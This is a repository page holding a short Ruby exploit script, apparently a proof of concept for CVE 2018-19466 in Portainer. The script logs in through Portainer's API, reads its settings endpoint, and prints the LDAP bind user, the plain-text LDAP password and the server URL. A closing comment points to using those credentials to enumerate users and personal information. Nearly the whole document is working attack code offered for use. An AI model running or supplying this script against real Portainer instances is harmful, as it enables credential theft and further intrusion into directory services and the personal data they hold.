-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathlempo.rb
executable file
·40 lines (40 loc) · 1.33 KB
/
lempo.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/ruby
require 'socket'
require 'net/http'
require 'uri'
require 'json'
if ARGV.length == 3
$host = ARGV[0]
$user = ARGV[1]
$pass = ARGV[2]
$port = "9000"
else
puts "[?] USAGE: #{__FILE__} HOST USER PASS"
exit 1
end
system("clear")
puts "Portainer LDAP Credentials Stored in Plain Text\nCVE 2018-19466 | Mauro Eldritch AKA plaguedoktor\n\n"
uri = URI.parse("http://#{$host}:#{$port}/api/auth")
request = Net::HTTP::Post.new(uri)
request.content_type = "application/json"
request.body = JSON.dump({
"Password" => "#{$pass}",
"Username" => "#{$user}"
})
response = Net::HTTP.start(uri.hostname, uri.port) do |http|
http.request(request)
end
token = JSON.parse(response.body)["jwt"]
puts "[*] Session Token: #{token}"
uri = URI.parse("http://#{$host}:#{$port}/api/settings")
request = Net::HTTP::Get.new(uri)
request["Authorization"] = "Bearer #{token}"
response = Net::HTTP.start(uri.hostname, uri.port) do |http|
http.request(request)
end
json_response = JSON.parse(response.body)
puts "\n[*][#{$host}]\nSettings:"
puts "\t- LDAP User: " + json_response["LDAPSettings"]["ReaderDN"]
puts "\t- LDAP Pass: " + json_response["LDAPSettings"]["Password"]
puts "\t- LDAP Host: " + json_response["LDAPSettings"]["URL"]
#Net::LDAP.open(...) can be used from now on to enumerate users and personal information.